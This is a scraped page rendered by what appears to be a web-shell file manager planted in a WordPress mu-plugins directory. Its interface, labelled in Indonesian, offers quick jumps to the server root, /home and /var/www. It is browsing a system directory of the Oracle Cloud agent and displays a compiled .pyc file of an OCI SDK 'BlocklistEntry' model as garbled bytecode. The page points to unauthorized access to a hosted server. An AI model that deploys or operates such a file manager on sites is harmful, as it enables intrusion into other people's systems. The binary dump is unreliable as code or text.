📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
jms
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/jms/models
💾
Free:
45.6 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: blocklist_entry.pyc
a O��fu � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdZdZdZdZdZdZ dZ d Zd ZdZ dZd d� Zedd� �Zejdd� �Zedd� �Zejdd� �Zdd� Zdd� Zdd� ZdS )�BlocklistEntryzJ An entry for blocklist to describe blocked operation and reason. �CREATE_FLEET�DELETE_FLEET� MOVE_FLEET�UPDATE_FLEET� UPDATE_FLEET_AGENT_CONFIGURATION�DELETE_JAVA_INSTALLATION�CREATE_JAVA_INSTALLATION�COLLECT_JFR�REQUEST_CRYPTO_EVENT_ANALYSIS�SCAN_JAVA_SERVER_USAGE�SCAN_LIBRARY_USAGEc K s( ddd�| _ ddd�| _d| _d| _dS )ay Initializes a new BlocklistEntry object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param operation: The value to assign to the operation property of this BlocklistEntry. Allowed values for this property are: "CREATE_FLEET", "DELETE_FLEET", "MOVE_FLEET", "UPDATE_FLEET", "UPDATE_FLEET_AGENT_CONFIGURATION", "DELETE_JAVA_INSTALLATION", "CREATE_JAVA_INSTALLATION", "COLLECT_JFR", "REQUEST_CRYPTO_EVENT_ANALYSIS", "SCAN_JAVA_SERVER_USAGE", "SCAN_LIBRARY_USAGE", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type operation: str :param reason: The value to assign to the reason property of this BlocklistEntry. :type reason: str �str)� operation�reasonr r N)� swagger_types� attribute_map� _operation�_reason)�self�kwargs� r ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/jms/models/blocklist_entry.py�__init__<